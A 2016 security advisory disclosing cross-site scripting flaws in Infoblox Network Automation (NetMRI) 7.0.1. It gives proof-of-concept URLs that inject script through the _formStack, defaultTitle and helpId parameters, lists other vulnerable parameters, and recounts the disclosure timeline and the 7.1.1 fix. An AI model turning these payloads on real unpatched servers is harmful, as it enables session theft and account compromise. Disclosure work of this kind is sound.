Infoblox 7.0.1 Cross Site Scripting

Credit: Alex Haynes
Risk: Low
Local: No
Remote: Yes

Exploit Title: Infoblox Cross-site scripting vulnerabilities Product: Infoblox Network Automation Vulnerable Versions: 7.0.1 and all previous versions Tested Version: 6.9.2 Advisory Publication: 06/09/2016 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: NONE Credit: Alex Haynes Advisory Details: (1) Vendor & Product Description -------------------------------- Vendor: Infoblox Product & Version: Infoblox Network Automation v7.0.1 Vendor URL & Download: Product Description: "Infoblox also offers a complementary, powerful network automation platform which enables discovery, switch port management, network change configuration and compliance management for multi-vendor network devices. Automation cuts down administrator workload and reduces risk of network outages due to improper configurations or changes." (2) Vulnerability Details: -------------------------- There are many cross-site scripting vulnerabilities present in netmri. Many parameters are vulnerable from the login page itself to other pages once the user is authenticated. Proof of concept examples below: _formstack variable vulnerable to XSS. https://NETMRISERVER/netmri/config/userAdmin/login.tdf?_formStack=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&mode=CHANGE-FORM&eulaAccepted=Accept&TrustToken=%0D&weakPassword=false&skipjackUsername=test&skipjackPassword=test&x=0&y=0 skipjackPassword variable and skipjackUsername variable are also vulnerable in the same URL. DefaultTitle parameter is vulnerable in the URL below (this page is from after authentication): https://NETMRISERVER/netmri/config/index.tdf?defaultTitle=9ba35%3Cimg/src=x%20onerror=alert%281%29%3E%22%3Edf522&defaultMenu=Collection_and_Groups&defaultAccordion=Setup&defaultPage=/webui/settings/groups%3FuseTab%3Ddev The defaultAccordion, defaultMenu and defaultPage parameters are also vulnerable. In the help Section, the helpId parameter is vulnerable: https://NETMRISERVER/netmri/help/netmri_help/netmri_help.tdf?useContext=1&helpId=networkanalysis_issues_issuesbytype58626%27%3balert%281%29%2f%2f390 (3) Advisory Timeline: ---------------------- 25/01/2016 - First Contact informing vendor of vulnerabilities. No response. 01/02/2016 - Follow up e-mail to inform them of vulnerabilities. Response requesting further information. 01/02/2016 - Information on vulnerabilities sent to vendor. No response. 08/02/2016 - follow up e-mail requesting update. Vendor responds asking us to open a support ticket. 12/02/2016 - Infoblox products out of support so cannot raise ticket. write to vendor to explain situation. No response. 24/02/2016 - Follow up with vendor on vulnerabilities requesting an update. 10/03/2016 - Final follow up to vendor requesting an update. Vendor responds and opens support ticket for vulnerabilities, mentioning they will look into vulnerabilities. 14/03/2016 - vendor responds saying they are able to reproduce vulnerabilities 17/03/2016 - Vendor responds saying some of the vulnerabilities are already fixed in version 7.0.4 but cannot confirm which ones. 05/04/2016 - Request update from vendor on status of vulnerabilities. 12/04/2016 - Vendor responds saying CSRF already fixed in 7.0.1, XSS and HTTP Splitting to be fixed in upcoming 7.1.1 - expected release in summer. 30/06/2016 - Patch 7.1.1 released 06/09/2016 - Public disclosure (4)Solution: ------------ Upgrade to Version 7.1.1 (5) Credits: ------------ Discovered by Alex Haynes

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